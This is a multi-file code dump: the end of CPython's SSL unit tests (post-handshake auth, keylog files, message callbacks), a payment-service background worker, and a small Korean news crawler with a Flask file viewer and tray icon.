# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=support.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(support.unlink, support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(support.TESTFN))
ctx.keylog_filename = support.TESTFN
self.assertEqual(ctx.keylog_filename, support.TESTFN)
self.assertTrue(os.path.isfile(support.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(support.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(support.unlink, support.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = support.TESTFN
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(support.unlink, support.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = support.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_TLSv1_3
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
worker.py
|
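# Background worker: initializes settings, pre-loads Tor/update/configurator
# data, schedules periodic refreshes, wires invoice event handlers, and then
# keeps the manager's websocket connection running. The __main__ block starts
# the log server in a child process before running the asyncio loop.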
import asyncio
import signal
import sys
from multiprocessing import Process
from api import events, invoices
from api import settings as settings_module
from api import tasks
from api.ext import backups as backup_ext
from api.ext import configurator as configurator_ext
from api.ext import tor as tor_ext
from api.ext import update as update_ext
from api.logserver import main as start_logserver
from api.logserver import wait_for_port
from api.settings import Settings
from api.utils.common import run_repeated
async def main():
settings = settings_module.settings_ctx.get()
await settings_module.init()
settings_module.log_startup_info()
await tor_ext.refresh(log=False) # to pre-load data for initial requests
await update_ext.refresh()
await configurator_ext.refresh_pending_deployments()
await backup_ext.manager.start()
asyncio.ensure_future(run_repeated(tor_ext.refresh, 60 * 10, 10))
asyncio.ensure_future(run_repeated(update_ext.refresh, 60 * 60 * 24))
settings.manager.add_event_handler("new_payment", invoices.new_payment_handler)
settings.manager.add_event_handler("new_block", invoices.new_block_handler)
    await invoices.create_expired_tasks()  # to ensure invoices actually get expired
coro = events.start_listening(tasks.event_handler) # to avoid deleted task errors
asyncio.ensure_future(coro)
await settings.manager.start_websocket(reconnect_callback=invoices.check_pending, force_connect=True)
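# SIGINT handler: terminate the log-server child process, then exit.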
def handler(signum, frame):
process.terminate()
sys.exit()
if __name__ == "__main__":
settings = Settings()
try:
token = settings_module.settings_ctx.set(settings)
process = Process(target=start_logserver)
process.start()
wait_for_port()
signal.signal(signal.SIGINT, handler)
asyncio.run(main())
finally:
settings_module.settings_ctx.reset(token)
|
main.py
|
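# News crawler with a small web UI (the CSS selectors appear to target Naver
# news pages): one Croler process is spawned per target URL from
# ./data/setting/crol_setting.json, articles are saved as JSON under
# ./data/<key>/, a Flask app on 127.0.0.1:2022 lists them, and a pystray
# tray icon opens the UI or quits the program.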
from multiprocessing import Process, Manager
import os,webbrowser,requests,json,time,re
from bs4 import BeautifulSoup as bs
from collections import OrderedDict
from flask import Flask, redirect, render_template
from pystray import MenuItem as item
import pystray
from PIL import Image
class Croler:
runingObjects = []
def __init__(self,key,url):
self.newsDic = OrderedDict()
self.key = key
self.url = url
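    # main(): fetch the headline list page once, then fetch every linked
    # article and record it in newsDic as  title -> "article body|url".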
def main(self):
try:
header = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"}
while True:
try:
res = requests.get(self.url, headers=header)
break
except:
continue
b = res.text
soup = bs(b,"html.parser")
newsList = soup.select_one("#main_content > div.list_body.newsflash_body > ul.type06_headline")
newsA = newsList.select("a")
for i in range(len(newsA)) :
while True:
try:
res_ = requests.get(newsA[i]["href"],headers=header)
break
except:
continue
newses = res_.text
soup_ = bs(newses,"html.parser")
inner = soup_.select_one('#articleBodyContents')
                # Skip articles already collected and links whose body could not
                # be located; otherwise store  title -> "body|url".
                title = newsA[i].get_text().replace("\t", "").replace("\n", "").replace('"', " ").replace("'", " ")
                if title in self.newsDic:
                    continue
                if not inner:
                    continue
                # Strip the flash-workaround script embedded in article bodies.
                body = inner.get_text().replace(
                    "\n\n\n\n\n// flash 오류를 우회하기 위한 함수 추가\nfunction _flash_removeCallback()", ""
                ).replace("\n", "").replace('"', " ").replace("'", " ")
                self.newsDic[title] = body + "|" + newsA[i]["href"]
except Exception as e:
print(self.key," : ",e)
self.main()
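    # totxt(): write each collected article to ./data/<key>/<title>.json; the
    # 'x' open mode raises for titles already saved, and those entries are then
    # dropped from newsDic in the except branch.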
def totxt(self):
for i in self.newsDic.copy().keys():
if i == "": continue
try:
inner = OrderedDict()
inner[self.key] = i+" | "+self.newsDic[i].replace("\t","").replace("{}","")
                i_ = re.sub(r'[\/:*?"<>|“”~]', ' ', i)  # strip characters not allowed in filenames
if not os.path.exists(f"./data/{self.key}"):
                    os.mkdir(f"./data/{self.key}")
with open(f'./data/{self.key}/{i_}.json','x', encoding="utf-8") as f:
json.dump(inner,f,ensure_ascii=False)
except:
self.newsDic.move_to_end(i)
self.newsDic.pop(i)
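    # loop(): register this crawler in the shared Manager dict, then repeat:
    # crawl five times at 3-minute intervals and flush the results to disk.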
def loop(self,p):
p[self.key] = self
print(p)
while True:
for i in range(5):
self.main()
time.sleep(180)
self.totxt()
def stop(self):
exit()
app = Flask(__name__)
@app.route("/")
def main_():
print(obs)
return render_template("main.html",test="test",list_ = obs)
@app.route("/<name>")
def lobby(name):
try:
return render_template("lobby.html",filelist = os.listdir(f"./data/{name}"))
except:
return redirect("/")
@app.route("/kill/<name>")
def killer(name):
try:
obs[name].stop()
obs.pop(name)
return redirect("/")
except Exception as e:
print("fail", e)
return redirect("/")
def flaskmain(q):
global obs
obs = q
app.run(host="127.0.0.1", port="2022")
def showfile():
    webbrowser.open_new_tab("http://127.0.0.1:2022")
def stop():
icon_.stop()
exit(0)
def main():
image = Image.open("./data/img/trayimg.jpg")
menu = (item("showFiles",showfile),item("exit",stop))
global icon_
icon_ = pystray.Icon('name',image,"ํ๋ธ ์์ง๊ธฐ",menu)
with open("./data/setting/crol_setting.json","r") as f:
global targetList
targetList = json.load(f)["targetList"]
for i in targetList.keys():
ob = Croler(i,targetList[i])
p = Process(target=ob.loop, args=(runingObjects,), daemon=True)
p.start()
Fp = Process(target=flaskmain,args=(runingObjects,) , daemon=True)
Fp.start()
icon_.run()
if __name__ == "__main__":
man = Manager()
runingObjects = man.dict()
main()
|